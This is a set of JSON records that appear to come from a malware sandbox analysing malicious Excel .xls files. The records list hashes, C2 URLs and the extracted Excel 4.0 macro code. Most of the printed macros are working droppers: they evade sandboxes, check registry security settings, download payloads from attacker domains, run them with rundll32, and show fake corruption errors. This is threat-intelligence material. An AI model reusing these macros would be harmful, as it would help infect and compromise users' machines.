f5a38d418588b6e59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b548061d9e15f149a171164006cf7dd6f8d9c77ccb6a536c3bcb38e9bafc7f2e"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b548061d9e15f149a171164006cf7dd6f8d9c77ccb6a536c3bcb38e9bafc7f2e","filesize":206336,"md5":"64c13ba17a0a23b50aa810bfd4f1f393","sha1":"fe2cacf4c2ad2ad417f1307e73623bdd285e89b0","sha256":"b548061d9e15f149a171164006cf7dd6f8d9c77ccb6a536c3bcb38e9bafc7f2e","sha512":"dc2e4688bb2cf89345f250fc6447f9526f93c938d2a98ffc22eb20b5e18049e02e17b45631734e80c29413cb046bea9123e30633d11a178185862655c405b1e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b548061d9e15f149a171164006cf7dd6f8d9c77ccb6a536c3bcb38e9bafc7f2e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zFkxKlEOoA\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b54ce5716f155302fab21fbe17cfc6b6cddcaf7029988b4871a50692c0df72c3"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b54ce5716f155302fab21fbe17cfc6b6cddcaf7029988b4871a50692c0df72c3","filesize":185344,"md5":"e1a0b5d780b945cbee826f3e5f915dc6","sha1":"75203d9e77b408604abadf48d051669061d79873","sha256":"b54ce5716f155302fab21fbe17cfc6b6cddcaf7029988b4871a50692c0df72c3","sha512":"5aa25e0a7f266e223d44ad52366747b2fcdcf0be239cb6631aca1babdfe5f26e315e5cb8fb5d4a643e7dc9bdd79527da99c4adaf32adbe00ad3c19ad242cc31a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b54ce5716f155302fab21fbe17cfc6b6cddcaf7029988b4871a50692c0df72c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b575957fe54ec772205e4368ccdda81a6cb401bd9856d42162236c052a7199a4"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b575957fe54ec772205e4368ccdda81a6cb401bd9856d42162236c052a7199a4","filesize":113664,"md5":"83a59140f3c67ca4c0f60734ac8fbd97","sha1":"24a12f2c7835f1e23d44c75ddca9179028985dca","sha256":"b575957fe54ec772205e4368ccdda81a6cb401bd9856d42162236c052a7199a4","sha512":"75a16cf7919fe72433f98f24667eed013bcc2b56a21ad8446d131d85f332aca626397aed97662f8b8f00a708fe61f1740c6c95e80cca9da83a57afe4dd76a429","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b575957fe54ec772205e4368ccdda81a6cb401bd9856d42162236c052a7199a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xP4WqQUvBo\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b578b5a4fd8b6d86fb969c3d2be77dc3dad9f38f4dd2d61a91eb60c7f3c031d6"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b578b5a4fd8b6d86fb969c3d2be77dc3dad9f38f4dd2d61a91eb60c7f3c031d6","filesize":177152,"md5":"dae2a6c1c10d77b2677228c21fa68881","sha1":"26f2b80fe89e411d975abc243e348a8c20dfa13c","sha256":"b578b5a4fd8b6d86fb969c3d2be77dc3dad9f38f4dd2d61a91eb60c7f3c031d6","sha512":"5251c61c7e709c811666bfba5ea013eadc98b8984aa673d1e9fe4473de64e7589ae95425b609463647a439638671a6057d4686221af430d4e4686fe4e8f5dbee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b578b5a4fd8b6d86fb969c3d2be77dc3dad9f38f4dd2d61a91eb60c7f3c031d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y6uR3UB4Ql\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b579e8111eacbf9c3eaba38f4fa3d072c979e5b0cafd81797b7c05eb50b5a21b"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b579e8111eacbf9c3eaba38f4fa3d072c979e5b0cafd81797b7c05eb50b5a21b","filesize":226304,"md5":"1073f4b9b1e80377cbfed92bb6eb0b29","sha1":"736845c565310055d81f6e38c3e1dbbb43557bde","sha256":"b579e8111eacbf9c3eaba38f4fa3d072c979e5b0cafd81797b7c05eb50b5a21b","sha512":"ebfd9e69e2f4e935f22494e45b04f190abfd0c5cfac91bd2e023bb6244e854bcba0451c625a3a825de97a8b3ec6376233d07df2ea9b24bf94af04fc7a45138cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b579e8111eacbf9c3eaba38f4fa3d072c979e5b0cafd81797b7c05eb50b5a21b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RVOEKHP4Qd\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b583d3589fc34e3db093a6dbcba577f08e09a13d04ffbc9870a97d5b8156b825"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b583d3589fc34e3db093a6dbcba577f08e09a13d04ffbc9870a97d5b8156b825","filesize":147968,"md5":"6e55e10d53af4a4b8c1a4d29cce22629","sha1":"d91e07f2281e307409da3d1a112ab0725ca86792","sha256":"b583d3589fc34e3db093a6dbcba577f08e09a13d04ffbc9870a97d5b8156b825","sha512":"9a67e574ea61e3b7bbd1e9be565870bc2fd6a4e45718590eee7e54e85736efb0a6cc9eeefe3a7e93aefb40fbeaedc5c1cacbb8f8d76989a3428165ae32776465","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b583d3589fc34e3db093a6dbcba577f08e09a13d04ffbc9870a97d5b8156b825.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"hKl9cvw4VO\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b58dec01cfb32b799382a479cf1e91bdf0656fa018c9737dfbdd6979b9b55bdc"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b58dec01cfb32b799382a479cf1e91bdf0656fa018c9737dfbdd6979b9b55bdc","filesize":206336,"md5":"d8815512072435a546dd1090eb1eb22f","sha1":"291f29f46d34ad9d36a3c038e889b9e6db867ce6","sha256":"b58dec01cfb32b799382a479cf1e91bdf0656fa018c9737dfbdd6979b9b55bdc","sha512":"a796a3209ee30deef8fd6942152a0cb14b7aef209d0bc0a08ea288fd6031b01a1a3b6f59b5e42e3816cda7d2a6c1c2a797b00df07286a1e82f81eeba5df041d1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b58dec01cfb32b799382a479cf1e91bdf0656fa018c9737dfbdd6979b9b55bdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dKLohzgvBP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5983e5953b2f82cd78dd0f1840404d3bc711c5bb50d214f739f2b58445ec6ac"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5983e5953b2f82cd78dd0f1840404d3bc711c5bb50d214f739f2b58445ec6ac","filesize":112128,"md5":"6f7a8a162bf883b5460233bf1951a894","sha1":"e73d1aec03daef4485ecbc52a1922f731124faca","sha256":"b5983e5953b2f82cd78dd0f1840404d3bc711c5bb50d214f739f2b58445ec6ac","sha512":"fb20a8089dccef0ef9e695d84bc0cebcb4587a606c8c77367ee29d086de72758a51142bd133ca8547522cee7bd6e20b1777debf8385631c3aae6b9acd73910c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5983e5953b2f82cd78dd0f1840404d3bc711c5bb50d214f739f2b58445ec6ac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5c7f29348de30fbe9a4abe0ac474e5840798db12585123788c6cbb2520caace"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5c7f29348de30fbe9a4abe0ac474e5840798db12585123788c6cbb2520caace","filesize":185344,"md5":"8fb7a05d35c6e6ce023108ed9156a80a","sha1":"0a8389d5b3ecc3bab7fd5ffa46bb71404c0de534","sha256":"b5c7f29348de30fbe9a4abe0ac474e5840798db12585123788c6cbb2520caace","sha512":"3530d367ba54b4b805048c0c460dccb9c00cacd76993bd755d42e70775fb7b3f403b80cf1b521caef613bd93c5ae04dfde896378509b48b179cad9753ded36c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5c7f29348de30fbe9a4abe0ac474e5840798db12585123788c6cbb2520caace.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5cd024106fa2e571b8050915bcf85a95882ee54173a7a8020bfe69d1dea39c7"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5cd024106fa2e571b8050915bcf85a95882ee54173a7a8020bfe69d1dea39c7","filesize":212992,"md5":"403089ba28110e1bbc09896d62b0e344","sha1":"2f697ce9536696d87762c8422fc85f3c6c420ec1","sha256":"b5cd024106fa2e571b8050915bcf85a95882ee54173a7a8020bfe69d1dea39c7","sha512":"33e8dc4c8a4a3124077ab5ddbf1cdb3c41ef2faa24b19d337392624d7901d6d925ae9b4dd4127d46b5aeb54309a9f893e76a6fb21aff704829c7e2bd99c7d138","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5cd024106fa2e571b8050915bcf85a95882ee54173a7a8020bfe69d1dea39c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1294mTTcvy\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5e6dc81aa655235f81e5083a605aced1171f21585ebfb3a7a3ec18e6f96842b"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5e6dc81aa655235f81e5083a605aced1171f21585ebfb3a7a3ec18e6f96842b","filesize":116224,"md5":"f247f0adbf59a38e3de7da3168ae9f7b","sha1":"2f534efff72bd26d4cb1b4d102560b005d738cb7","sha256":"b5e6dc81aa655235f81e5083a605aced1171f21585ebfb3a7a3ec18e6f96842b","sha512":"fbee11f866b2e085d02520208e509e4e0347e91684fc2b17cf2cf5f9980073e178953ab563676f191940304b5786964b2141c52c47372c1dae9c09f1d75882f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5e6dc81aa655235f81e5083a605aced1171f21585ebfb3a7a3ec18e6f96842b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ygukfJgieA\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5ed5aac36bc992fd45be400f3aeaef9d8f1dff55790816a80c0c7535e346565"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5ed5aac36bc992fd45be400f3aeaef9d8f1dff55790816a80c0c7535e346565","filesize":116224,"md5":"0539b89114ac30e2566a22d7c66bef96","sha1":"08cc7436271ff961b0086f14c8bb37b6465f1646","sha256":"b5ed5aac36bc992fd45be400f3aeaef9d8f1dff55790816a80c0c7535e346565","sha512":"33d24547aa7816dee7501e33adf973fb18da2a0f46187193c47d1de0461331c9f6dbe3def6b458c74ce2bf2e682d0e2b1acd39d98b77f738be2e589e271d5e2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5ed5aac36bc992fd45be400f3aeaef9d8f1dff55790816a80c0c7535e346565.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wUgMcj5ND9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5ede07a1aca8463e55f884e79eeec5a9f98c9b155749bdf42cd632f71331fe1"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5ede07a1aca8463e55f884e79eeec5a9f98c9b155749bdf42cd632f71331fe1","filesize":225280,"md5":"9161434e38e3a4be19dc7535e5e203a4","sha1":"74afe14460067332ebff5ea47b36f1495219947f","sha256":"b5ede07a1aca8463e55f884e79eeec5a9f98c9b155749bdf42cd632f71331fe1","sha512":"f9fe90ac2b208d09397c233bfa3f1abea36f49e8851cf0dddecdc53376c89dd9135ebe00a0049399106ab951901a3c33f640d39489e26389a7fa9f7dcbddf6ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5ede07a1aca8463e55f884e79eeec5a9f98c9b155749bdf42cd632f71331fe1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tZCzcJLdx8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5f1765aac3a625bfa3697cbae09f8c1bd8ec1c4eeb4e9cb91257ca993d2b013"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5f1765aac3a625bfa3697cbae09f8c1bd8ec1c4eeb4e9cb91257ca993d2b013","filesize":168960,"md5":"ecc9064396cf38eb9058b33ea1ea6570","sha1":"44f4cb88832d311bfd4de42fc466cf8d9f9f9f0d","sha256":"b5f1765aac3a625bfa3697cbae09f8c1bd8ec1c4eeb4e9cb91257ca993d2b013","sha512":"96b1ab723673c065a904eefa28111b586a016f1865c801a1db0a63b4da6fbda7f346d597a282601b0f93df1a2719e79f01a34a0b2521589508a31283f04c31f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5f1765aac3a625bfa3697cbae09f8c1bd8ec1c4eeb4e9cb91257ca993d2b013.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZEcvenZnQD\",TRUE)\nGOTO(R$0C$19)"}}}]}
